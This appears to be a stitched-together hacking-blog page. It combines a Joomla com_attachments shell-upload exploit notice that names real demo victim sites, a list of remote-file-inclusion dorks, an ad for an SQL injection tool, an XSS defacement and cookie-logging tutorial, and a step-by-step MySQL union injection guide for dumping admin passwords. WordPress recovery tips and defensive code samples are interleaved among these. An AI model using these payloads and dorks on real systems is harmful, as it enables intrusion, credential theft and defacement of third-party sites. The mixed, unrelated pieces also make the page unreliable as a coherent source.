Joomla Attachments Shell Upload

# Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability
# Google Dork: inurl:”index.php?option=com_attachments”
# Date: 2013-07-09
# Exploit Author: Stars Hacking Team
# We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der
# Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com
# Vendor Homepage: http://joomla.org
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115
# Tested on: Lin
#######################################################################################################
# ~> ExpLoit <~
#
# http://target/index.php?option=com_attachments&task=upload
#
# 1. Upload Your File . !
# 2. Find Your File in This Path:
# http://target/attachments/article
# 3. End 😛
#
########################################################################################################
# ~> DeMo <~
# http://www.iwalkforlife.com/index.php?option=com_attachments&task=upload
# http://www.iwalkforlife.com/attachments/article/0/stars.jpg
# —-
# http://www.lgbtpsychology2013.com/index.php/en/?option=com_attachments&task=upload
# http://www.sailors-club.net/index.php?option=com_attachments&task=upload
# http://www.project-establis.eu/index.php?option=com_attachments&task=upload
########################################################################################################
# Spt : Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX
# iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X

RFI Dorks

/_functions.php?prefix=

/cpcommerce/_functions.php?prefix=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/agendax/addevent.inc.php?agendax_path=

/ashnews.php?pathtoashnews=

/eblog/blog.inc.php?xoopsConfig[xoops_url]=

/pm/lib.inc.php?pm_path=

/b2-tools/gm-2-b2.php?b2inc=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/includes/include_once.php?include_file=

/e107/e107_handlers/secure_img_render.php?p=

/shoutbox/expanded.php?conf=

/main.php?x=

/myPHPCalendar/admin.php?cal_dir=

/index.php/main.php?x=

/index.php?include=

/index.php?x=

/index.php?open=

/index.php?visualizar=

/template.php?pagina=

/index.php?pagina=

/index.php?inc=

/includes/include_onde.php?include_file=

/index.php?page=

/index.php?pg=

/index.php?show=

/index.php?cat=

/index.php?file=

/db.php?path_local=

/index.php?site=

/htmltonuke.php?filnavn=

/livehelp/inc/pipe.php?HCL_path=

/hcl/inc/pipe.php?HCL_path=

/inc/pipe.php?HCL_path=

/support/faq/inc/pipe.php?HCL_path=

/help/faq/inc/pipe.php?HCL_path=

/helpcenter/inc/pipe.php?HCL_path=

/live-support/inc/pipe.php?HCL_path=

/gnu3/index.php?doc=

/gnu/index.php?doc=

/phpgwapi/setup/tables_update.inc.php?appdir=

/forum/install.php?phpbb_root_dir=

/includes/calendar.php?phpc_root_path=

/includes/setup.php?phpc_root_path=

/inc/authform.inc.php?path_pre=

/include/authform.inc.php?path_pre=

index.php?nic=

index.php?sec=

index.php?content=

index.php?link=

index.php?filename=

index.php?dir=

index.php?document=

index.php?view=

*.php?sel=

*.php?session=&content=

*.php?locate=

*.php?place=

*.php?layout=

*.php?go=

*.php?catch=

*.php?mode=

*.php?name=

*.php?loc=

*.php?f=

*.php?inf=

*.php?pg=

*.php?load=

*.php?naam=

all/index.php?page= site:*.ru

all/index.php?file= site:*.ru

Recover Your Hacked WordPress Website In Easy Steps?

WordPress is one of the most popular content management systems at present. However, as a general rule, increasing popularity comes with a number of dangers, and WordPress has gained the attention of the bad boys as well. Many people report hacked WordPress accounts on a regular basis, so I have put together a complete guide on how to recover your hacked WordPress.

Ways To Recover Hacked Account

Below is the path to follow to get your hacked account back:
Backup – Even if your website is infected only to a small extent, it is still necessary to secure a backup of your website rather than waiting and watching things get worse. Don’t forget to back up your entire database and all files. You can also try a faster solution by using BackupBuddy.
Change Login Details and Secret Access Keys – As soon as you sense the hacking attempt, try to log in to your account to check whether your login details still work. If the username and password have not yet been changed, immediately change all the WordPress secret access keys in the wp-config.php file and, of course, your username and password.
Running Scanners – Running a scanner is also a very helpful step and comes at number 3 in this list. The scanners are basically used for identifying compromises at the database level. You can try the Cloud Sites WP Scanner plug-in or Sucuri Malware Scanner. After running the scanner, make sure to move on to the next step below.
Installing Your WordPress Again – The next important step involves deleting all the files in the WordPress directory except the wp-config.php file and the wp-content directory. After that, download and install a totally fresh copy of WordPress. Now edit the wp-config-sample.php file, substituting the sample values with the actual database values from the wp-config.php file that you kept. Now you can delete the present file and replace it with your own file.
Review Content Folder – The next task is to check all the folders in your wp-content directory for any suspicious activity. Carefully analyze the folders’ content and remove anything that does not seem to belong to you. If you later find that a folder was actually needed, you can get it back from your backup.
Analyze and Re-install Your Plug-ins – After reviewing the folders’ content, the next step is reviewing the plug-ins. Work out which plug-ins you are not currently using and uninstall them all for the time being. For the activated plug-ins that you are currently using, deactivate and delete them, then re-install and activate them again.
Analyze Your Themes – The next thing to take care of is removing the extra themes that are not currently in use. Then review your activated theme. Look through the PHP or JavaScript code for any suspicious activity. Most of the time hackers make such malicious changes in the header.php or footer.php files.
Following this step-by-step guide can really help you get your WordPress back. Also remember to keep checking the activity on your WordPress site, and make it a habit to back up your database from time to time. For more recovery details you can check http://codex.wordpress.org/FAQ_My_site_was_hacked.
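
For the "Review Content Folder" and "Analyze Your Themes" steps, one way to find what changed is to compare the live directory with a clean copy of the same release. This is an added example, not part of the original guide; the function names and the sample files are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path


def digests(root):
    """Map every file under root (relative path) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def review(live_dir, clean_dir):
    """Diff a live theme or plug-in directory against a clean copy of it."""
    live, clean = digests(live_dir), digests(clean_dir)
    return {
        "added": sorted(live.keys() - clean.keys()),
        "modified": sorted(f for f in live.keys() & clean.keys()
                           if live[f] != clean[f]),
        "missing": sorted(clean.keys() - live.keys()),
    }


def write_tree(root, files):
    """Create the given {relative path: text} files under root."""
    for rel, text in files.items():
        path = Path(root) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text, encoding="utf-8")


def demo():
    """Constructed sample: a clean theme and a live copy with two changes."""
    clean = {"header.php": "<?php // header ?>\n",
             "footer.php": "<?php // footer ?>\n",
             "style.css": "body { margin: 0; }\n"}
    live = dict(clean)
    live["footer.php"] += "<!-- constructed: line not in the clean copy -->\n"
    live["inc/unknown.php"] = "<?php // constructed: not in the clean copy ?>\n"
    with tempfile.TemporaryDirectory() as base:
        write_tree(Path(base) / "clean", clean)
        write_tree(Path(base) / "live", live)
        return review(Path(base) / "live", Path(base) / "clean")


if __name__ == "__main__":
    for kind, names in demo().items():
        print(kind, names)
```

On a real site, pass the theme or plug-in folder under wp-content as `live_dir` and a freshly downloaded copy of the same version as `clean_dir`; anything listed as added or modified is what to read by hand.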

How to Secure before Getting hacked !

Everyone wants to make their blog secure and safe from hackers, so that hackers cannot take any kind of information from it. You can protect your blog and increase its security by doing the following things:
Chap Secure plugin
You can increase the security of your log-in by using the Chap Secure plugin. It helps by encrypting passwords using the CHAP protocol. It will make trouble for a hacker.
Login Lockdown Plugin
This plugin helps a lot in stopping a hacker, because if he is trying to play with your login screen, the plugin will limit him after a few wrong attempts. Just download the plugin and activate it. This plugin helps to secure your blog from newbie hackers. ;)
WP Security Scan
This plugin helps to check all the code of your website for malware and hacking scripts. It can find out which code or which file in the blog has a virus.
Updating WordPress regularly
Try to upgrade WordPress as soon as any new version is launched. Most bloggers do not update WordPress, and the chances are huge that an old WordPress version can get hacked.
Tac Theme Checker
You can install a plugin, “Tac Theme checker”, which can check your theme before you activate it. It checks the complete theme when you upload it into the Dashboard, and it checks the files completely in a few seconds.
Make your security Bullet proof
You should increase your security further by following the official steps from the WordPress website, which you can read here: http://codex.wordpress.org/Hardening_WordPress.
Theme of your Blog
Your theme plays an important part in hacking. If you are using a cracked version of a theme, be ready to get hacked soon. Cracked themes often contain code that helps to get you hacked. I would suggest getting a proper theme from a web design company so that there is no chance of getting hacked due to unethical themes.
I hope these steps will help protect you from all hack attempts. If you have any other method, do let us know in the comments below. Thank you.

sql poison 1.1- sqli exploit scanner+search hunter+injection builder tool


New Features:
“Look n Feel” is more attractive now.
Rich “Context Menu” items.
“Results” contain checkboxes to enable selection.
“Selected Dork” box is editable now for user convenience.
Built-in Browser for “Injection Builder” to check the impact of injection.
“Text Bucket” available for “Injection Builder” to save extra data.
“Insert Order By” button is added to “Injection Builder”.
“Internet Browser” with Snapshot and HTML DOM Tree.

Bug Fixes:
It won’t get stuck after pressing the stop button. Just a minor wait can occur, which is okay.
Progress bar for “Crawler” has been fixed. It will show correct progress now.
Error on importing file is fixed now. You can import files from other directories as well.
“Searchqu” shows invalid results. It is fixed now.

Sql Poizon v1.1 – Sqli Exploit Scanner, Search Hunter, Injection Builder Tool


XSS : Cross Site Scripting Tutorial

Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting, plus how to exploit it.

What is XSS, what can I accomplish with it?
XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website, whether it be JavaScript, HTML or XML. XSS is mainly directed at JavaScript injection. However, you can inject other languages, which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

What causes the vulnerability?
Poor PHP coding within text boxes and submission forms. The developers were too lazy to code it properly, which allows us to inject strings into the source code: whatever we type is written back into the page, so it ends up in the page's source as well. They did not bother to filter what we type in, and allowed characters such as ", > and /.

What types of XSS are there?
There are two types of XSS: persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it’s still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website; you will only see it once. With persistent XSS you can do much more: leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

What will you be teaching today?
The basics of XSS and cookie logging.

How to test for XSS vulnerabilities.
To test if the website is vulnerable to XSS we want to go to a search box and inject some JavaScript. We’ve found a search box and now we want to use JavaScript to alert a message so we can see if the JavaScript was successfully executed.

**<*script*>alert(‘XSS’);

(remove every * )
We now see a pop-up message on our screen saying “XSS”. This is what it should look like: http://img845.imageshack.us/img845/7924/xss1.png

In some cases, a message might not pop up. If it doesn’t work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

“*>*alert(‘XSS’);
(remove every * )
Okay, we have found out that it is vulnerable. We can now move on.
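
The cause described above, seen from the defending side: the same search page with the term pasted in raw and with the term encoded on output, fed the two test strings from this section. This is an added example, not part of the original tutorial; Python stands in for the site's PHP, and the page markup and function names are assumptions.

```python
from html import escape
from html.parser import HTMLParser

# The two test strings from the section above: the alert probe, and the
# variant that first closes an attribute with ">.
PROBES = ["<script>alert('XSS');</script>",
          "\"><script>alert('XSS');</script>"]


def render_unsafe(term):
    """Vulnerable: the search term is pasted into the HTML unfiltered."""
    return ('<form><input name="q" value="' + term + '"></form>'
            '<p>Results for ' + term + '</p>')


def render_safe(term):
    """Hardened: encode on output; quote=True also encodes " and '."""
    enc = escape(term, quote=True)
    return ('<form><input name="q" value="' + enc + '"></form>'
            '<p>Results for ' + enc + '</p>')


class _Audit(HTMLParser):
    """Parses the page and records what the reflected input turned into."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.script_tags = 0
        self.input_value = None
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        if tag == "input":
            self.input_value = dict(attrs).get("value")

    def handle_data(self, data):
        self.text.append(data)


def audit(page):
    """Return (number of <script> elements, input value, visible text)."""
    parser = _Audit()
    parser.feed(page)
    parser.close()
    return parser.script_tags, parser.input_value, "".join(parser.text)


if __name__ == "__main__":
    for probe in PROBES:
        print("unsafe:", audit(render_unsafe(probe))[0], "script element(s)")
        print("safe:  ", audit(render_safe(probe))[0], "script element(s)")
```

With encoding in place the user still sees exactly what was typed, both in the box and in the results line, but the parser finds no script element in either context.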

How can I deface a webpage with XSS?
I will be showing you methods for persistent, and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it’s persistent I want to redirect my victims to a deface page. We simply inject some more JavaScript like we did before:
<*script*>window.location=”*http://yourdefacepage.com/index.html”;<*/script*>
(remove every * )
Remember, you can always alter the code if it doesn’t work.
You can do many things with XSS, you just need all the right strings. I’m only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.
Okay. Obviously we can’t redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

MySQL Injection : Step By Step Tutorial

Learn How To Hack Websites , Mysql Injection Step by Step Tutorial 

 
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial I will be showing you the steps to carry out the attack on a MySQL database.
Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ‘ after the number in the url. For example:

www.site.com/page=1′
If the database is vulnerable, the page will spit out a MySQL error such as:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the “order by” command, entering “order by 1--”, “order by 2--” and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive a MySQL error at “order by 5”, that means we have 4 columns. If the site errored on “order by 9” then we would have 8 columns. If this does not work, replace the -- after the number with /*, as they are two different prefixes and if one works the other tends not to. It just depends on the way the database is configured as to which prefix is used.

Step 3

We are now going to use the “union” command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put union all select 1,2,3,4,5,6,7--. If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these don’t work, try…
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the “table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords: admin tables, or member or user tables.

Step 6
In this step we want to list all the column names in the database. To do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user, email and password.

Step 7

Finally we need to dump the data. Say we want to get the “username” and “password” fields from the table “admin”; we would use the following command:
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the “concat” command matches up the username with the password so you don’t have to guess. If this command is successful then you should be presented with a page full of usernames and passwords from the website.
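
Every step above depends on the request value being pasted into the SQL text. The following added example (not part of the original tutorial) puts a concatenated query beside one that uses a bound parameter and sends both the same request values. It assumes an in-memory SQLite database in place of MySQL, with constructed tables and data, and all function names are hypothetical.

```python
import sqlite3

# Request values shaped like the steps above. The last one is adapted to
# SQLite syntax; the page's group_concat(...,0x3a,...) form is MySQL-specific.
PROBES = [
    "1'",
    "1 order by 4--",
    "1 order by 5--",
    "1 union all select 1,username,password,4 from admin--",
]


def make_db():
    """Constructed sample data: a public 4-column table and a private one."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news  (id INTEGER, title TEXT, body TEXT, author TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO news  VALUES (1, 'Welcome', 'First post', 'editor');
        INSERT INTO admin VALUES ('root', 'constructed-hash');
    """)
    return db


def page_unsafe(db, page):
    """Vulnerable: the request value becomes part of the SQL text."""
    sql = "SELECT id, title, body, author FROM news WHERE id = " + page
    return db.execute(sql).fetchall()


def page_safe(db, page):
    """Hardened: the SQL text is fixed and the value is a bound parameter."""
    sql = "SELECT id, title, body, author FROM news WHERE id = ?"
    return db.execute(sql, (page,)).fetchall()


def respond(handler, db, page):
    """Return ("ok", rows) or ("error", message), as the page would show it."""
    try:
        return ("ok", handler(db, page))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(repr(probe))
        print("  concatenated:", respond(page_unsafe, db, probe))
        print("  bound:       ", respond(page_safe, db, probe))
```

With the bound parameter the whole value is compared to `id` as data, so each of these request values returns no rows and no database error, while a plain `1` still returns the article.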